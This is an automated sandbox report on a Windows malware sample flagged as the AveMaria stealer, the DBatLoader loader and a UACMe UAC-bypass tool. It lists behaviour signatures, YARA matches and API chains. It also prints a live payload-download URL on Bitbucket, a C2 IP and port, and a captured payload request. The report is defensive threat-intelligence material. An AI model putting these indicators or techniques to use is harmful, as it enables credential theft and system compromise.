Windows Analysis Report
qqig1mHX8U.exe

Overview

General Information

Sample name: qqig1mHX8U.exe
renamed because original name is a hash value
Original sample name: 0d24a03ffaf0eb8d6fa4c2f6b19b00a1330cc79e9126b333c0602a053e02a28e.exe
Analysis ID: 1562868
MD5: 488ab7717e5e101d15ed68323b150907
SHA1: c1a33ce7d9203f527d47440d4c4906b72aa37b8e
SHA256: 0d24a03ffaf0eb8d6fa4c2f6b19b00a1330cc79e9126b333c0602a053e02a28e
Tags: doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

AveMaria, DBatLoader, UACMe
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AveMaria stealer
Yara detected DBatLoader
Yara detected UACMe UAC Bypass tool
AI detected suspicious sample
Allocates many large memory junks
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if Internet connection is working
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Increases the number of concurrent connection per server for Internet Explorer
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create new users
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Ave Maria, AveMariaRAT, avemaria Information stealer which uses AutoIT for wrapping.
  • Anunak
 https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Name Description Attribution Blogpost URLs Link
UACMe A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: qqig1mHX8U.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Avira: detection malicious, Label: HEUR/AGEN.1326062
Found malware configuration
Source: qqig1mHX8U.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://bitbucket.org/masterservicwes/mastermanservices/downloads/145_Lrtuqtwkqjp"]}
Source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack Malware Configuration Extractor: AveMaria {"C2 url": "87.120.125.217", "port": 7845, "Proxy Port": 111}
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: qqig1mHX8U.exe ReversingLabs: Detection: 63%
Yara detected AveMaria stealer
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21166898.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2400002737.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000001.2536364319.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.2613500142.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424461904.0000000021167000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000001.2400116274.000000000041A000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3547503805.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2575772053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Machine Learning detection for dropped file
Source: C:\Users\Public\Libraries\Lrtuqtwk.PIF Joe Sandbox ML: detected
Machine Learning detection for sample
Source: qqig1mHX8U.exe Joe Sandbox ML: detected
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004108A6 LocalAlloc,BCryptDecrypt,EntryPoint,EntryPoint,LocalFree, 10_2_004108A6
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040DA6A lstrlenA,CryptStringToBinaryA,lstrcpyA, 10_2_0040DA6A
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00410468 CryptUnprotectData,LocalAlloc,LocalFree, 10_2_00410468
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040CC6B RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 10_2_0040CC6B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004105C0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 10_2_004105C0
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00410620 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 10_2_00410620
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_004108A6 LocalAlloc,BCryptDecrypt,EntryPoint,EntryPoint,LocalFree, 21_2_004108A6
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040DA6A lstrlenA,CryptStringToBinaryA,lstrcpyA, 21_2_0040DA6A
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_00410468 CryptUnprotectData,LocalAlloc,LocalFree, 21_2_00410468
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040CC6B RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW, 21_2_0040CC6B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_004105C0 CryptStringToBinaryW,LocalAlloc,CryptStringToBinaryW,LocalFree, 21_2_004105C0
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_00410620 BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 21_2_00410620

Exploits
barindex
Yara detected UACMe UAC Bypass tool
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21165028.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c3d258.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f874b8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.1.kwtqutrL.pif.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21efc9f8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.211515e8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21edfd88.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 21.2.kwtqutrL.pif.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.kwtqutrL.pif.21152e58.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.qqig1mHX8U.exe.21f6a848.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.kwtqutrL.pif.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.Lrtuqtwk.PIF.20c205e8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2400002737.000000007EF44000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021EDF000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424443585.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424018007.0000000021165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000001.2536364319.0000000000554000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3547503805.0000000000554000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000001.2613500142.0000000000554000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2423107004.0000000021155000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000001.2400116274.0000000000554000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2424419773.0000000021151000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.2575772053.0000000000554000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441581581.0000000021F6A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.2572232052.0000000020C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: qqig1mHX8U.exe PID: 6672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kwtqutrL.pif PID: 7052, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Lrtuqtwk.PIF PID: 6584, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kwtqutrL.pif PID: 6812, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: kwtqutrL.pif PID: 6956, type: MEMORYSTR

Compliance
barindex
Detected unpacking (overwrites its own PE header)
Source: C:\Users\Public\Libraries\kwtqutrL.pif Unpacked PE file: 10.2.kwtqutrL.pif.400000.4.unpack
Source: C:\Users\Public\Libraries\kwtqutrL.pif Unpacked PE file: 21.2.kwtqutrL.pif.400000.7.unpack
Uses 32bit PE files
Source: qqig1mHX8U.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\Public\Libraries\kwtqutrL.pif Directory created: C:\Program Files\Microsoft DN1 Jump to behavior
Source: unknown HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 16.182.101.153:443 -> 192.168.2.12:49713 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: qqig1mHX8U.exe, qqig1mHX8U.exe, 00000000.00000003.2303201589.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DB0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2301265871.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020D7F000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2418192192.0000000002F3E000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E00000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.2389531552.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000008.00000000.2397762668.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000B.00000000.2410760437.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000C.00000000.2414590371.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000010.00000000.2512408677.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000011.00000000.2517869273.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000012.00000000.2519481424.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.2393869535.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 0000000D.00000000.2415883952.0000000000D41000.00000020.00000001.01000000.0000000A.sdmp, xpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: qqig1mHX8U.exe, 00000000.00000002.2442484350.000000007F1C0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2374914928.000000007EFA0000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000002.3547503805.00000000007D0000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 0000000A.00000001.2400116274.0000000000560000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000710000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.00000000007F0000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000710000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: qqig1mHX8U.exe, 00000000.00000003.2303201589.000000007FB50000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2395728628.0000000021C2E000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2395728628.0000000021BFD000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DB0000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2302443683.0000000002D5C000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000003.2301265871.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2415926480.0000000002D5A000.00000004.00000020.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020D7F000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2439003284.0000000020DC7000.00000004.00001000.00020000.00000000.sdmp, qqig1mHX8U.exe, 00000000.00000002.2418192192.0000000002F3E000.00000004.00001000.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000001.2536364319.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000015.00000002.2575772053.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E90000.00000040.00000001.00020000.00000000.sdmp, kwtqutrL.pif, 00000017.00000001.2613500142.0000000000E00000.00000040.00000001.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000C.00000000.2414590371.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000010.00000000.2512408677.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000011.00000000.2517869273.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000012.00000000.2519481424.0000000000521000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.5.dr
Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.2393869535.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 0000000D.00000000.2415883952.0000000000D41000.00000020.00000001.01000000.0000000A.sdmp, xpha.pif.6.dr
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02F15908
Source: C:\Users\Public\alpha.pif Code function: 8_2_00530207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 8_2_00530207
Source: C:\Users\Public\alpha.pif Code function: 8_2_0053589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 8_2_0053589A
Source: C:\Users\Public\alpha.pif Code function: 8_2_00543E66 FindFirstFileW,FindNextFileW,FindClose, 8_2_00543E66
Source: C:\Users\Public\alpha.pif Code function: 8_2_00534EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 8_2_00534EC1
Source: C:\Users\Public\alpha.pif Code function: 8_2_0052532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 8_2_0052532E
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 10_2_0040C293
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW, 10_2_00413C83
Source: C:\Users\Public\alpha.pif Code function: 12_2_0053589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose, 12_2_0053589A
Source: C:\Users\Public\alpha.pif Code function: 12_2_00530207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove, 12_2_00530207
Source: C:\Users\Public\alpha.pif Code function: 12_2_00543E66 FindFirstFileW,FindNextFileW,FindClose, 12_2_00543E66
Source: C:\Users\Public\alpha.pif Code function: 12_2_00534EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW, 12_2_00534EC1
Source: C:\Users\Public\alpha.pif Code function: 12_2_0052532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose, 12_2_0052532E
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040C293 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA, 21_2_0040C293
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_00413C83 FindFirstFileW,lstrlenW,lstrcpyW,FindNextFileW, 21_2_00413C83
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_00413DA4 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,lstrlenW,lstrcpyW,lstrlenW, 10_2_00413DA4

Networking
barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://bitbucket.org/masterservicwes/mastermanservices/downloads/145_Lrtuqtwkqjp
Source: Malware configuration extractor URLs: 87.120.125.217
Contains functionality to check if Internet connection is working
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_0040820B getaddrinfo,socket,htons,freeaddrinfo,WSAConnect,send,EntryPoint,recv,closesocket, microsoft.com 10_2_0040820B
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 21_2_0040820B getaddrinfo,socket,htons,freeaddrinfo,WSAConnect,send,EntryPoint,recv,closesocket, microsoft.com 21_2_0040820B
Contains functionality to check if a connection to the internet is available
Source: C:\Users\user\Desktop\qqig1mHX8U.exe Code function: 0_2_02F2E4B8 InternetCheckConnectionA, 0_2_02F2E4B8
Contains functionality to download and execute PE files
Source: C:\Users\Public\Libraries\kwtqutrL.pif Code function: 10_2_004036EA URLDownloadToFileW,ShellExecuteW, 10_2_004036EA
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.12:49714 -> 87.120.125.217:7845
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.166.143.50 185.166.143.50
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49713 -> 16.182.101.153:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.12:49712 -> 185.166.143.50:443
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /masterservicwes/mastermanservices/downloads/145_Lrtuqtwkqjp HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: bitbucket.org
